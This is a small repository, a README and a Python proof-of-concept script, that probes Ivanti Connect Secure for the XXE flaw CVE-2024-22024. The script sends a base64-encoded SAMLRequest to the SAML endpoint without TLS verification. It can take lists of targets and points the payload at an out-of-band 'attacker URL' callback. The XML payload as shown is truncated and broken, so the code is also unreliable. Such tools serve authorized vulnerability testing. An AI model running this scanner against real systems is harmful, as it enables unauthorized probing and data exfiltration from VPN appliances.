├── README.md └── cve_2024_22024.py /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2024-22024 2 | Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure 3 | 4 | > [!WARNING] 5 | > FOR EDUCATIONAL PURPOSE AND AUTHORIZED TESTING ONLY. 6 | 7 | ### Parameters 8 | - `-u` or `--target_url`: The target Ivanti Connect Secure (ICS) URL or file with list of URLs. 9 | 10 | - `-c` or `--attacker_url`: The attacker URL (generate one using Burp Collaborator, ngrok, or by using a unique URL from [Webhook.site](https://webhook.site)) 11 | 12 | - `-t` or `--timeout`: Timeout in seconds for the request (default is 3 seconds) 13 | 14 | 15 | ### How to use 16 | Testing a single URL: 17 | 18 | `python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com` 19 | 20 | Testing list of URLs: 21 | 22 | `python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com` 23 | 24 | Using a different timeout (5 seconds): 25 | 26 | `python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5` 27 | 28 | # Credits 29 | Whoever discovered the vulnerability .. I just read the PoC and automated this. 
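30 | 31 | [0dteam website](https://www.0d.ae) 32 | -------------------------------------------------------------------------------- /cve_2024_22024.py: --------------------------------------------------------------------------------
import base64
import requests
import argparse
from pathlib import Path
import urllib3
from urllib3.exceptions import InsecureRequestWarning

# Suppress only the single InsecureRequestWarning from urllib3.
# The warning would otherwise fire on every request, because send_request()
# posts with verify=False.
urllib3.disable_warnings(InsecureRequestWarning)

'''
PoC by Abdulla
CVE-2024-22024 (XXE) for Ivanti Connect Secure and Ivanti Policy Secure
Remediation:
https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US
'''


def send_request(target_url, attacker_url, timeout):
    """POST the SAMLRequest probe to one target and print the HTTP outcome.

    The printed status code only shows that the endpoint answered. The
    response body is never inspected, so the status line is not a verdict on
    whether the target is affected or patched. Per the README, the URL passed
    as ``attacker_url`` is an out-of-band listener, so any confirmation has to
    be read there rather than from this script's output.

    Args:
        target_url: Base URL of the appliance under test.
        attacker_url: Callback URL; "/test" is appended before formatting.
        timeout: Request timeout in seconds, passed to ``requests.post``.

    Returns:
        None. Results and errors are printed, never raised.
    """
    # NOTE(review): as captured on this page the template holds no "{}"
    # placeholder (its markup appears to have been lost in extraction), so
    # .format() below returns the string unchanged and the callback URL never
    # reaches the payload. The literal is kept exactly as found.
    xml_payload_template = """ %xxe;]>"""
    xml_payload = xml_payload_template.format(attacker_url + "/test")
    encoded_payload = base64.b64encode(xml_payload.encode()).decode()
    data = {'SAMLRequest': encoded_payload}

    # A trailing slash on the base URL would otherwise give "//dana-na/...".
    endpoint = target_url.rstrip("/") + "/dana-na/auth/saml-sso.cgi"

    try:
        # verify=False turns off TLS certificate validation, so the host that
        # answers is not authenticated; a result can be attributed to the
        # wrong system if the connection is intercepted or misrouted.
        response = requests.post(endpoint, data=data, verify=False, timeout=timeout)
        print(f"Response from {target_url}: {response.status_code}")
    except requests.exceptions.Timeout:
        print(f"Request to {target_url} timed out.")
    except Exception as exc:
        # Still best-effort (one bad entry must not abort a list run), but the
        # reason is reported instead of being discarded.
        print(f"Error sending request to {target_url}: {exc}")


def main(target_urls, attacker_url, timeout):
    """Run send_request() for one URL or for every URL listed in a file.

    Args:
        target_urls: Either a path to a text file with one URL per line, or a
            single URL. Anything that is not an existing file is treated as
            a URL.
        attacker_url: Passed through to send_request().
        timeout: Passed through to send_request().
    """
    if Path(target_urls).is_file():
        with open(target_urls, 'r') as file:
            # Blank lines and stray whitespace would otherwise become
            # requests to an empty or malformed base URL.
            urls = [line.strip() for line in file if line.strip()]
        for url in urls:
            send_request(url, attacker_url, timeout)
    else:
        send_request(target_urls, attacker_url, timeout)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure by Abdulla.")
    parser.add_argument("-u", "--target_url", required=True, help="The target URL or file with URLs where the SAML request should be sent")
    parser.add_argument("-c", "--attacker_url", required=True, help="The attacker URL to include in the XXE payload")
    parser.add_argument("-t", "--timeout", type=int, default=3, help="Timeout in seconds for the request (default is 3 seconds)")
    args = parser.parse_args()

    main(args.target_url, args.attacker_url, args.timeout)

--------------------------------------------------------------------------------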